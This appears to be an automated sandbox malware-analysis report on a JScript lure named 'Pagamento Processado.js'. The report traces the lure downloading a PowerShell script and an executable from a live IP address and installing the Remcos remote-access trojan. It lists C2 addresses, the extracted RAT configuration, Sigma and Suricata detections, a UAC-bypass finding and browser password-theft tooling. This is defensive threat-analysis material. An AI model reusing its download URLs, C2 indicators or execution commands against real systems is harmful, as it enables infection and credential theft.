Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe", ParentImage: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ParentProcessId: 7564, ParentProcessName: JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7684, ProcessName: chrome.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6216, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49695

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pagamento Processado.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pagamento Processado.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pagamento Processado.js", ProcessId: 6216, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pagamento Processado.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6216, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", ProcessId: 7336, ProcessName: powershell.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 8E 29 FA 00 8D 45 A1 C3 7B 52 D1 6E AA 2C 16 8F 42 C2 19 AE E1 FD EB CF 73 00 50 FC CA 76 E2 D1 71 B4 FA BF 00 9F F2 26 D6 32 C7 14 0A CC CF 34 F7 C0 4F EE CF 8C 6C CF 23 AD 9C 30 B8 CB 7C 4B F3 BC 24 0B 09 1F 02 DD A6 19 41 02 13 81 DA CA 89 F4 C8 CF D7 1D DC AE 99 A9 04 7D 3E 67 26 C4 F3 35 85 DC C7 51 A5 6F FA 0C 00 3B C4 FE D0 56 DA B3 D6 74 C5 E0 D8 ED 2D 82 28 ED AA 9B 0A 3C 3A 8F AF F3 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessId: 7564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-U6XQL5\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T19:50:23.552911+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49698	196.251.69.63	2721	TCP
2025-03-14T19:50:24.927895+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49701	196.251.69.63	2721	TCP
2025-03-14T19:50:25.012869+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49700	196.251.69.63	2721	TCP

ET MALWARE Windows executable base64 encoded

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T19:50:18.386488+0100	2018856	1	A Network Trojan was detected	176.65.144.3	80	192.168.2.6	49695	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T19:50:25.489094+0100	2803304	3	Unknown Traffic	192.168.2.6	49702	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Avira: detection malicious, Label: TR/Injector.brfgl

Found malware configuration

Source: 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["196.251.69.63:2721:1"], "Assigned name": "Brazil", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-U6XQL5", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: Pagamento Processado.js

ReversingLabs: Detection: 19%

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2518531242.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2518531242.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

11_2_00433B64

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_350bf6b6-5

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00406ABC _wcslen,CoGetObject,

11_2_00406ABC

Source:	Binary string: CXZfASD.pdbTFnF source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000009.00000000.1380630778.0000000000012000.00000002.00000001.01000000.00000008.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: CXZfASD.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000009.00000000.1380630778.0000000000012000.00000002.00000001.01000000.00000008.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	11_2_004090DC
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040B6B5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	11_2_0041C7E5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040B8BA
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0044E989 FindFirstFileExA,	11_2_0044E989
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	11_2_00408CDE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00419CEE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	11_2_00407EDD
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00406F13 FindFirstFileW,FindNextFileW,	11_2_00406F13
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	11_2_040B10F1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040B6580 FindFirstFileExA,	11_2_040B6580
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10005B50 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_10005B50
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10007E40 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_10007E40
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10019083 FindFirstFileExA,	11_2_10019083
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10007510 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,	11_2_10007510
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0040B477 FindFirstFileW,FindNextFileW,	13_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	14_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	15_2_00407898

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00407357

Software Vulnerabilities

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: Pagamento Processado.js	Argument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true']			Go to definition
Source: Pagamento Processado.js	Argument value : ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Scripting.FileSystemObject"']			Go to definition

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 4x nop then jmp 008A52C8h

9_2_008A5188

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 37MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49698 -> 196.251.69.63:2721
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49700 -> 196.251.69.63:2721
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49701 -> 196.251.69.63:2721
Source: Network traffic	Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 176.65.144.3:80 -> 192.168.2.6:49695

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 176.65.144.3 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 196.251.69.63

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

Source: Pagamento Processado.js	Return value : ['W79oEfjzi8kQW7hdQ8olW6lcHW,CZ/cNtyaW7nF,WRJdUmoQW6VcTdnbp8kXWR7cINNdMW,CreateFolder,http://176.65.14', 'CZ/cNtyaW7nF,WRJdUmoQW6VcTdnbp8kXWR7cINNdMW,CreateFolder,http://176.65.144.3/dev/kent.ps1,Open,i10Bc', 'mmkOvuzbWPuKW5ZdGGZcThlcImkbWOXnWOjYf3yCWRG,gezsWORcOmooWRW,fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Od', 'fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Odchbwd8onWPOZWRKrWRxcJZZdQmk6mmouW4Cy,W79oEfjzi8kQW7hdQ8olW6l', 'gezsWORcOmooWRW,fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Odchbwd8onWPOZWRKrWRxcJZZdQmk6mmouW4Cy,W79oEfj']	Go to definition
Source: Pagamento Processado.js	Argument value : ['"GET","http://176.65.144.3/dev/kent.ps1",false', '"Send"']	Go to definition
Source: Pagamento Processado.js	Argument value : ['"http://176.65.144.3/dev/kent.ps1","8VT5"']	Go to definition
Source: Pagamento Processado.js	Argument value : ['"http://176.65.144.3/dev/kent.ps1","8VT5"']	Go to definition
Source: Pagamento Processado.js	Return value : ['"http://176.65.144.3/dev/kent.ps1"']	Go to definition
Source: Pagamento Processado.js	Return value : ['mmkOvuzbWPuKW5ZdGGZcThlcImkbWOXnWOjYf3yCWRG,gezsWORcOmooWRW,fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Od', 'fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Odchbwd8onWPOZWRKrWRxcJZZdQmk6mmouW4Cy,W79oEfjzi8kQW7hdQ8olW6l', 'gezsWORcOmooWRW,fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Odchbwd8onWPOZWRKrWRxcJZZdQmk6mmouW4Cy,W79oEfj']	Go to definition
Source: Pagamento Processado.js	Return value : ['mmkOvuzbWPuKW5ZdGGZcThlcImkbWOXnWOjYf3yCWRG,gezsWORcOmooWRW,fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Od']	Go to definition
Source: Pagamento Processado.js	Argument value : ['"http://176.65.144.3/dev/kent.ps1"']	Go to definition
Source: Pagamento Processado.js	Return value : ['"http://176.65.144.3/dev/kent.ps1"']	Go to definition
Source: Pagamento Processado.js	Argument value : ['"http://176.65.144.3/dev/kent.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']	Go to definition
Source: Pagamento Processado.js	Return value : ['mmkOvuzbWPuKW5ZdGGZcThlcImkbWOXnWOjYf3yCWRG,gezsWORcOmooWRW,fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Od']	Go to definition
Source: Pagamento Processado.js	Return value : ['mmkOvuzbWPuKW5ZdGGZcThlcImkbWOXnWOjYf3yCWRG,gezsWORcOmooWRW,fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Od', 'gezsWORcOmooWRW,fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Odchbwd8onWPOZWRKrWRxcJZZdQmk6mmouW4Cy,W79oEfj']	Go to definition
Source: Pagamento Processado.js	Return value : ['mmkOvuzbWPuKW5ZdGGZcThlcImkbWOXnWOjYf3yCWRG,gezsWORcOmooWRW,fJyxfsBdQMH9WPFcJmoUFZSgomkDWRtcP8owW5Od']	Go to definition
Source: Pagamento Processado.js	Return value : ['"http://176.65.144.3/dev/kent.ps1"', '"MSXML2.XMLHTTP"']	Go to definition
Source: Pagamento Processado.js	Argument value : ['"http://176.65.144.3/dev/kent.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']	Go to definition
Source: Pagamento Processado.js	Return value : ['"http://176.65.144.3/dev/kent.ps1"', '"Send"']	Go to definition
Source: Pagamento Processado.js	Argument value : ['"http://176.65.144.3/dev/kent.ps1"']	Go to definition

Source: global traffic

TCP traffic: 192.168.2.6:49698 -> 196.251.69.63:2721

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Mar 2025 18:50:21 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Thu, 13 Mar 2025 06:57:55 GMTETag: "79c00-63033d761b108"Accept-Ranges: bytesContent-Length: 498688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 6a c8 65 08 0b a6 36 08 0b a6 36 08 0b a6 36 bc 97 57 36 1b 0b a6 36 bc 97 55 36 a3 0b a6 36 bc 97 54 36 16 0b a6 36 01 73 22 36 09 0b a6 36 96 ab 61 36 0a 0b a6 36 5a 63 a3 37 36 0b a6 36 5a 63 a2 37 29 0b a6 36 5a 63 a5 37 12 0b a6 36 01 73 35 36 13 0b a6 36 08 0b a7 36 4f 0a a6 36 a5 62 af 37 6c 0b a6 36 a5 62 59 36 09 0b a6 36 a5 62 a4 37 09 0b a6 36 52 69 63 68 08 0b a6 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2b 43 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 72 05 00 00 26 02 00 00 00 00 00 64 4d 03 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 08 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 01 07 00 04 01 00 00 00 80 07 00 80 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 07 00 ac 3c 00 00 70 e6 06 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 e7 06 00 18 00 00 00 a8 e6 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 05 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5b 71 05 00 00 10 00 00 00 72 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 8c 01 00 00 90 05 00 00 8e 01 00 00 76 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 5e 00 00 00 20 07 00 00 0e 00 00 00 04 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 4a 00 00 00 80 07 00 00 4c 00 00 00 12 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3c 00 00 00 d0 07 00 00 3e 00 00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /dev/kent.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 176.65.144.3 176.65.144.3
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View	ASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
Source: Joe Sandbox View	ASN Name: Web4AfricaZA Web4AfricaZA

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49702 -> 178.237.33.50:80

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00427321 recv,

11_2_00427321

